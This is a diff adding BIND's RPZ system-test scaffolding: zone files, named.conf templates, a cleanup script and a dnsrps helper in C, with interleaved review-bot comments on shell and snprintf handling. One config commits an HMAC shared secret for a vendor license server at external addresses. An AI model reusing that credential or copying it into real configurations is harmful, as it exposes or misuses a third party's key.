+ rm -f ${TARGETS}
+
diff --git a/bin/tests/system/rpz/README b/bin/tests/system/rpz/README
new file mode 100644
index 0000000..238e360
--- /dev/null
+++ b/bin/tests/system/rpz/README
@@ -0,0 +1,36 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+The test setup for the RPZ tests prepares a query perf tool and sets up
+policy zones.
+
+Name servers
+------------
+
+ns1 is the root server.
+
+ns2 and ns4 are authoritative servers for the various test domains.
+
+ns3 is the main rewriting resolver.
+
+ns5 and ns7 are additional rewriting resolvers.
+
+ns6 is a forwarding server.
+
+
+Updating the response policy zones
+----------------------------------
+
+test1, test2, test3, test4, test5, and test6 are dynamic update files. These
+updates are made against ns3. The script function "start_group" is called to
+start an new batch of tests that may depend on certain server updates. The
+function takes an optional file name and if provided the server updates are
+performed before executing the test batch.
diff --git a/bin/tests/system/rpz/clean.sh b/bin/tests/system/rpz/clean.sh
new file mode 100644
index 0000000..1a3127c
--- /dev/null
+++ b/bin/tests/system/rpz/clean.sh
@@ -0,0 +1,57 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# Clean up after rpz tests.
+
+USAGE="$0: [-Px]"
+DEBUG=
+while getopts "Px" c; do
+ case $c in
+ x) set -x ;;
+ P) PARTIAL=set ;;
+ *) echo "$USAGE" 1>&2; exit 1;;
+ esac
+done
+shift `expr $OPTIND - 1 || true`
+if test "$#" -ne 0; then
+ echo "$USAGE" 1>&2
+ exit 1
+fi
+
+# this might be called from setup.sh to partially clean up the files
+# from the first test pass so the second pass can be set up correctly.
+# remove those files first, then decide whether to remove the others.
+rm -f ns*/*.key ns*/*.private
+rm -f ns2/tld2s.db */bl.tld2.db */bl.tld2s.db
+rm -f ns3/bl*.db ns3/fast-expire.db ns*/empty.db
+rm -f ns3/manual-update-rpz.db
+rm -f ns3/mixed-case-rpz.db
+rm -f ns5/example.db ns5/bl.db ns5/fast-expire.db ns5/expire.conf
+rm -f ns8/manual-update-rpz.db
+rm -f */policy2.db
+rm -f */*.jnl
+
+if [ ${PARTIAL:-unset} = unset ]; then
+ rm -f proto.* dsset-* trusted.conf dig.out* nsupdate.tmp ns*/*tmp
+ rm -f ns5/requests ns5/*.perf
+ rm -f */named.memstats */*.run */*.run.prev */named.stats */session.key
+ rm -f */*.log */*core */*.pid
+ rm -f ns*/named.lock
+ rm -f ns*/named.conf
+ rm -f ns*/*switch
+ rm -f dnsrps*.conf
+ rm -f dnsrpzd.conf
+ rm -f dnsrpzd-license-cur.conf dnsrpzd.rpzf dnsrpzd.sock dnsrpzd.pid
+ rm -f ns*/managed-keys.bind*
+ rm -f tmp
+fi
diff --git a/bin/tests/system/rpz/dnsrps.c b/bin/tests/system/rpz/dnsrps.c
new file mode 100644
index 0000000..82ee05f
--- /dev/null
+++ b/bin/tests/system/rpz/dnsrps.c
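Review bot: `PARTIAL` is never initialised before the getopts loop (the script clears `DEBUG=` instead, which nothing reads afterwards), so a `PARTIAL` value inherited from the caller's environment makes `[ ${PARTIAL:-unset} = unset ]` false and silently skips the full cleanup. Replacing `DEBUG=` with `PARTIAL=` closes that gap. The expansion in the test is also unquoted; `[ "${PARTIAL:-unset}" = unset ]` keeps it a single word whatever the variable holds. All the `rm -f` globs are relative and nothing in the script changes directory first, so a comment such as `# must be run from the rpz system test directory` above the first `rm` would document the assumption.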
@@ -0,0 +1,172 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * -a exit(0) if dnsrps is available or dlopen() msg if not + * -p print the path to dnsrpzd configured in dnsrps so that + * dnsrpzd can be run by a setup.sh script. + * Exit(1) if dnsrps is not available + * -n domain print the serial number of a domain to check if a new + * version of a policy zone has been transferred to dnsrpzd. + * Exit(1) if dnsrps is not available + * -w sec.ond wait for seconds, because `sleep 0.1` is not portable + */ + +#include <errno.h> +#include <inttypes.h> +#include <stdbool.h> +#include <stdint.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/stat.h> +#include <sys/types.h> +#include <unistd.h> + +#include <isc/print.h> +#include <isc/util.h> + +#ifdef USE_DNSRPS +#define LIBRPZ_LIB_OPEN DNSRPS_LIB_OPEN +#include <dns/librpz.h> + +librpz_t *librpz; +#else /* ifdef USE_DNSRPS */ +typedef struct { + char c[120]; +} librpz_emsg_t; +#endif /* ifdef USE_DNSRPS */ + +static bool +link_dnsrps(librpz_emsg_t *emsg); + +#define USAGE "usage: [-ap] [-n domain] [-w sec.onds]\n" + +int +main(int argc, char **argv) { +#ifdef USE_DNSRPS + char cstr[sizeof("zone ") + 1024 + 10]; + librpz_clist_t *clist; + librpz_client_t *client; + librpz_rsp_t *rsp; + uint32_t serial; +#endif /* ifdef USE_DNSRPS */ + double seconds; + librpz_emsg_t emsg; + char *p; + int i; + + while ((i = getopt(argc, argv, "apn:w:")) != -1) { + switch (i) { + case 'a': + if (!link_dnsrps(&emsg)) { + printf("I:%s\n", emsg.c); + return (1); + } + return (0); + + case 'p': + if 
(!link_dnsrps(&emsg)) { + fprintf(stderr, "## %s\n", emsg.c); + return (1); + } +#ifdef USE_DNSRPS + printf("%s\n", librpz->dnsrpzd_path); +#else /* ifdef USE_DNSRPS */ + UNREACHABLE(); +#endif /* ifdef USE_DNSRPS */ + return (0); + + case 'n': + if (!link_dnsrps(&emsg)) { + fprintf(stderr, "## %s\n", emsg.c); + return (1); + } +#ifdef USE_DNSRPS + /* + * Get the serial number of a policy zone from + * a running dnsrpzd daemon. + */ + clist = librpz->clist_create(&emsg, NULL, NULL, NULL, + NULL, NULL); + if (clist == NULL) { + fprintf(stderr, "## %s: %s\n", optarg, emsg.c); + return (1); + } + snprintf(cstr, sizeof(cstr), + "zone %s; dnsrpzd \"\";" + " dnsrpzd-sock dnsrpzd.sock;" + " dnsrpzd-rpzf dnsrpzd.rpzf", + optarg); + client = librpz->client_create(&emsg, clist, cstr, + true); + if (client == NULL) { + fprintf(stderr, "## %s\n", emsg.c); + return (1); + } + + rsp = NULL; + if (!librpz->rsp_create(&emsg, &rsp, NULL, client, true, + false) || + rsp == NULL) + { + fprintf(stderr, "## %s\n", emsg.c); + librpz->client_detach(&client); + return (1); + } + + if (!librpz->soa_serial(&emsg, &serial, optarg, rsp)) { + fprintf(stderr, "## %s\n", emsg.c); + librpz->client_detach(&client); + return (1); + } + librpz->rsp_detach(&rsp); + librpz->client_detach(&client); + printf("%u\n", serial); +#else /* ifdef USE_DNSRPS */ + UNREACHABLE(); +#endif /* ifdef USE_DNSRPS */ + return (0); + + case 'w': + seconds = strtod(optarg, &p); + if (seconds <= 0 || *p != '\0') { + fputs(USAGE, stderr); + return (1); + } + usleep((int)(seconds * 1000.0 * 1000.0)); + return (0); + + default: + fputs(USAGE, stderr); + return (1); + } + } + fputs(USAGE, stderr); + return (1); +} + +static bool +link_dnsrps(librpz_emsg_t *emsg) { +#ifdef USE_DNSRPS + librpz = librpz_lib_open(emsg, NULL, DNSRPS_LIBRPZ_PATH); + if (librpz == NULL) { + return (false); + } + + return (true); +#else /* ifdef USE_DNSRPS */ + snprintf(emsg->c, sizeof(emsg->c), "DNSRPS not configured"); + return (false); +#endif /* 
ifdef USE_DNSRPS */ +} diff --git a/bin/tests/system/rpz/dnsrpzd-license.conf b/bin/tests/system/rpz/dnsrpzd-license.conf new file mode 100644 index 0000000..d9cf2b5 --- /dev/null +++ b/bin/tests/system/rpz/dnsrpzd-license.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone isc.license.fastrpz.com { + masters port 53 { + KEY farsight_fastrpz_license 104.244.14.176; + KEY farsight_fastrpz_license 2620:11c:f008::176; + }; +}; + +key farsight_fastrpz_license { + algorithm hmac-sha256; secret "f405d02b4c8af54855fcebc1"; +}; diff --git a/bin/tests/system/rpz/dnsrpzd.conf.in b/bin/tests/system/rpz/dnsrpzd.conf.in new file mode 100644 index 0000000..ce2442c --- /dev/null +++ b/bin/tests/system/rpz/dnsrpzd.conf.in 
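Review bot: In the `-n` branch of main(), the return value of `snprintf(cstr, sizeof(cstr), "zone %s; ...", optarg)` is never checked, and `cstr` is sized as `sizeof("zone ") + 1024 + 10` although the fixed text of the format is much longer than the 10 bytes reserved for it, so a sufficiently long domain argument is silently truncated into a malformed configuration string before it reaches `client_create()`. `optarg` is also pasted into that string unvalidated, so an argument containing `;` would add further statements to the configuration; that matters little while only the test scripts call the tool, but it is cheap to reject. I would capture the result and fail on truncation, `n = snprintf(...); if (n < 0 || (size_t)n >= sizeof(cstr)) { fputs(USAGE, stderr); return (1); }`, and refuse names containing `;` or whitespace before formatting. Separately, in the `-w` branch `(int)(seconds * 1000.0 * 1000.0)` is undefined for values that do not fit in an int, so an upper bound on `seconds` belongs next to the `seconds <= 0` check.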
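Review bot: The `key farsight_fastrpz_license` block commits an HMAC-SHA256 shared secret in clear text next to two public server addresses in the `masters` list, and nothing in the file says whether that secret is meant to be public. If it is a vendor-published evaluation key, state that in a comment such as `/* public test-only license key, not a private credential */` so that secret scanners and later readers can tell it from a leak; if it is not, it should be supplied at setup time rather than stored in the tree. The `masters` entries also point outside the 10.53.0.x addresses used by the rest of this test, so whatever consumes the file presumably contacts external hosts during a test run; that dependency, and how the test behaves offline, deserves a line in the README.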
@@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# dnsrpzd configuration. + +pid-file ../dnsrpzd.pid + +include ../dnsrpzd-license-cur.conf + +# configure NOTIFY and zone transfers +port @EXTRAPORT1@; +listen-on port @EXTRAPORT1@ { 10.53.0.3; }; +allow-notify { 10.53.0.0/24; }; + +zone "bl0" {type primary; file "../ns5/bl.db"; }; +zone "bl1" {type primary; file "../ns5/bl.db"; }; +zone "bl2" {type primary; file "../ns5/bl.db"; }; +zone "bl3" {type primary; file "../ns5/bl.db"; }; +zone "bl4" {type primary; file "../ns5/bl.db"; }; +zone "bl5" {type primary; file "../ns5/bl.db"; }; +zone "bl6" {type primary; file "../ns5/bl.db"; }; +zone "bl7" {type primary; file "../ns5/bl.db"; }; +zone "bl8" {type primary; file "../ns5/bl.db"; }; +zone "bl9" {type primary; file "../ns5/bl.db"; }; +zone "bl10" {type primary; file "../ns5/bl.db"; }; +zone "bl11" {type primary; file "../ns5/bl.db"; }; +zone "bl12" {type primary; file "../ns5/bl.db"; }; +zone "bl13" {type primary; file "../ns5/bl.db"; }; +zone "bl14" {type primary; file "../ns5/bl.db"; }; +zone "bl15" {type primary; file "../ns5/bl.db"; }; +zone "bl16" {type primary; file "../ns5/bl.db"; }; +zone "bl17" {type primary; file "../ns5/bl.db"; }; +zone "bl18" {type primary; file "../ns5/bl.db"; }; +zone "bl19" {type primary; file "../ns5/bl.db"; }; + +zone "bl" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-2" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-given" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-passthru" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone 
"bl-no-op" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-disabled" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-nodata" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-nxdomain" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-cname" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-wildcname" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-garden" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-drop" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-tcp-only" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl.tld2" {type slave; masters port @PORT@ { 10.53.0.3; }; }; + +zone "policy1" {type slave; masters port @PORT@ { 10.53.0.6; }; }; +zone "policy2" {type slave; masters port @PORT@ { 10.53.0.7; }; }; diff --git a/bin/tests/system/rpz/ns1/named.conf.in b/bin/tests/system/rpz/ns1/named.conf.in new file mode 100644 index 0000000..439ecff --- /dev/null +++ b/bin/tests/system/rpz/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." {type primary; file "root.db";}; 
diff --git a/bin/tests/system/rpz/ns1/root.db b/bin/tests/system/rpz/ns1/root.db
new file mode 100644
index 0000000..6bf3d5a
--- /dev/null
+++ b/bin/tests/system/rpz/ns1/root.db
@@ -0,0 +1,42 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 120
+. SOA ns. hostmaster.ns. ( 1 3600 1200 604800 60 )
+ NS ns.
+ns. A 10.53.0.1
+
+; rewrite responses from this zone
+tld2. NS ns.tld2.
+ns.tld2. A 10.53.0.2
+
+; rewrite responses from this secure zone unless dnssec requested (DO=1)
+tld2s. NS ns.tld2.
+
+; requests come from here
+tld3. NS ns.tld3.
+ns.tld3. A 10.53.0.3
+
+; rewrite responses from this zone
+tld4. NS ns.tld4.
+ns.tld4. A 10.53.0.4
+
+; performance test
+tld5. NS ns.tld5.
+ns.tld5. A 10.53.0.5
+
+; generate SERVFAIL
+servfail NS ns.tld2.
+
+a-only.example A 1.2.3.4
+no-a-no-aaaa.example TXT placeholder
+a-plus-aaaa.example A 1.2.3.4
+a-plus-aaaa.example AAAA ::1
diff --git a/bin/tests/system/rpz/ns10/hints b/bin/tests/system/rpz/ns10/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns10/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns10/named.conf.in b/bin/tests/system/rpz/ns10/named.conf.in
new file mode 100644
index 0000000..b34ce79
--- /dev/null
+++ b/bin/tests/system/rpz/ns10/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.10;
+ notify-source 10.53.0.10;
+ transfer-source 10.53.0.10;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.10; };
+ listen-on-v6 { none; };
+ notify no;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+controls {
+ inet 10.53.0.10 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "../trusted.conf";
+zone "." { type hint; file "hints"; };
+
+# grafted on zones using stub and static-stub
+zone "stub-nomatch." {type primary; file "stub.db"; };
+zone "static-stub-nomatch." {type primary; file "stub.db"; };
diff --git a/bin/tests/system/rpz/ns10/stub.db b/bin/tests/system/rpz/ns10/stub.db
new file mode 100644
index 0000000..8ecac8c
--- /dev/null
+++ b/bin/tests/system/rpz/ns10/stub.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ rewrite responses from this zone
+
+$TTL 120
+@ SOA ns hostmaster.ns ( 1 3600 1200 604800 60 )
+ NS ns
+ns A 10.53.0.10
+
+a3-1 A 10.53.99.99
+
+a4-1 A 10.53.99.99
diff --git a/bin/tests/system/rpz/ns2/base-tld2s.db b/bin/tests/system/rpz/ns2/base-tld2s.db
new file mode 100644
index 0000000..77114ec
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/base-tld2s.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ rewrite responses from this signed zone
+
+$TTL 120
+@ SOA tld2s. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 )
+ NS ns
+ NS . ; check for RT 24985
+ns A 10.53.0.2
+
+
+a0-1 A 192.168.0.1
+a0-1-scname CNAME a0-1.tld2.
+
+a3-5 A 192.168.3.5
+
+a7-2 A 192.168.7.2
diff --git a/bin/tests/system/rpz/ns2/bl.tld2.db.in b/bin/tests/system/rpz/ns2/bl.tld2.db.in
new file mode 100644
index 0000000..25780b7
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/bl.tld2.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; primary for secondary RPZ zone
+
+$TTL 3600
+@ SOA rpz.tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 )
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+32.1.7.168.192.rpz-ip CNAME .
diff --git a/bin/tests/system/rpz/ns2/blv2.tld2.db.in b/bin/tests/system/rpz/ns2/blv2.tld2.db.in
new file mode 100644
index 0000000..123e1b4
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/blv2.tld2.db.in
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; primary for secondary RPZ zone
+
+$TTL 3600
+@ SOA rpz.tld2. hostmaster.ns.tld2. ( 2 3600 1200 604800 60 )
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
diff --git a/bin/tests/system/rpz/ns2/blv3.tld2.db.in b/bin/tests/system/rpz/ns2/blv3.tld2.db.in
new file mode 100644
index 0000000..b8ba587
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/blv3.tld2.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; primary for secondary RPZ zone
+
+$TTL 3600
+@ SOA rpz.tld2. hostmaster.ns.tld2. ( 3 3600 1200 604800 60 )
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+32.1.7.168.192.rpz-ip CNAME .
diff --git a/bin/tests/system/rpz/ns2/hints b/bin/tests/system/rpz/ns2/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns2/named.conf.in b/bin/tests/system/rpz/ns2/named.conf.in
new file mode 100644
index 0000000..1dde354
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/named.conf.in
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ notify no;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "../trusted.conf";
+zone "." { type hint; file "hints"; };
+
+zone "tld2." {type primary; file "tld2.db";};
+zone "sub1.tld2." {type primary; file "tld2.db";};
+zone "subsub.sub1.tld2." {type primary; file "tld2.db";};
+zone "sub2.tld2." {type primary; file "tld2.db";};
+zone "subsub.sub2.tld2." {type primary; file "tld2.db";};
+zone "sub3.tld2." {type primary; file "tld2.db";};
+zone "subsub.sub3.tld2." {type primary; file "tld2.db";};
+
+zone "tld2s." {type primary; file "tld2s.db";};
+
+zone "bl.tld2." {type primary; file "bl.tld2.db";
+ notify yes; notify-delay 0;};
+
+# grafted on zones using stub and static-stub
+zone "stub." {type primary; file "stub.db"; };
+zone "static-stub." {type primary; file "stub.db"; };
diff --git a/bin/tests/system/rpz/ns2/stub.db b/bin/tests/system/rpz/ns2/stub.db
new file mode 100644
index 0000000..e4b8781
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/stub.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ rewrite responses from this zone
+
+$TTL 120
+@ SOA tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 )
+ NS ns.sub1.tld2.
+
+a3-1 A 10.53.99.99
+
+a4-1 A 10.53.99.99
diff --git a/bin/tests/system/rpz/ns2/tld2.db b/bin/tests/system/rpz/ns2/tld2.db
new file mode 100644
index 0000000..c6f2556
--- /dev/null
+++ b/bin/tests/system/rpz/ns2/tld2.db
@@ -0,0 +1,125 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ rewrite responses from this zone + +$TTL 120 +@ SOA tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns + NS . ; check for RT 24985 +ns A 10.53.0.2 + + +txt-only TXT "txt-only-tld2" + +a12 A 12.12.12.12 + AAAA 2001::12 + TXT "a12 tld2 text" +a12-cname CNAME a12 + +a0-1 A 192.168.0.1 + AAAA 2001:2::1 + TXT "a0-1 tld2 text" +a0-1-scname CNAME a0-1.tld2s. + + +a3-1 A 192.168.3.1 + AAAA 2001:2:3::1 + TXT "a3-1 tld2 text" + +a3-2 A 192.168.3.2 + AAAA 2001:2:3::2 + TXT "a3-2 tld2 text" + +a3-3 A 192.168.3.3 + AAAA 2001:2:3::3 + TXT "a3-3 tld2 text" + +a3-4 A 192.168.3.4 + AAAA 2001:2:3::4 + TXT "a3-4 tld2 text" + +a3-5 A 192.168.3.5 + AAAA 2001:2:3::5 + TXT "a3-5 tld2 text" + +a3-6 A 192.168.3.6 + AAAA 2001:2:3::6 + TXT "a3-6 tld2 text" + +a3-7 A 192.168.3.7 + AAAA 2001:2:3::7 + TXT "a3-7 tld2 text" + +a3-8 A 192.168.3.8 + AAAA 2001:2:3::8 + TXT "a3-8 tld2 text" + +a3-9 A 192.168.3.9 + AAAA 2001:2:3::9 + TXT "a3-9 tld2 text" + +a4-1 A 192.168.4.1 + AAAA 2001:2:4::1 + TXT "a4-1 tld2 text" +a4-1-aaaa AAAA 2001:2:4::1 + +a4-2 A 192.168.4.2 + AAAA 2001:2:4::2 + TXT "a4-2 tld2 text" +a4-2-cname CNAME a4-2 + +a4-3 A 192.168.4.3 + AAAA 2001:2:4::3 + TXT "a4-3 tld2 text" +a4-3-cname CNAME a4-3 + +a4-4 A 192.168.4.4 + AAAA 2001:2:4::4 + TXT "a4-4 tld2 text" + +a4-5 A 192.168.4.5 + AAAA 2001:2:4::5 + TXT "a4-5 tld2 text" +a4-5-cname CNAME a4-5 +a4-5-cname2 CNAME a4-5-cname +a4-5-cname3 CNAME a4-5-cname2 + +a4-6 A 192.168.4.6 + AAAA 2001:2:4::6 + TXT "a4-6 tld2 text" +a4-6-cname CNAME a4-6 +a4-6-cname2 CNAME a4-6-cname +a4-6-cname3 
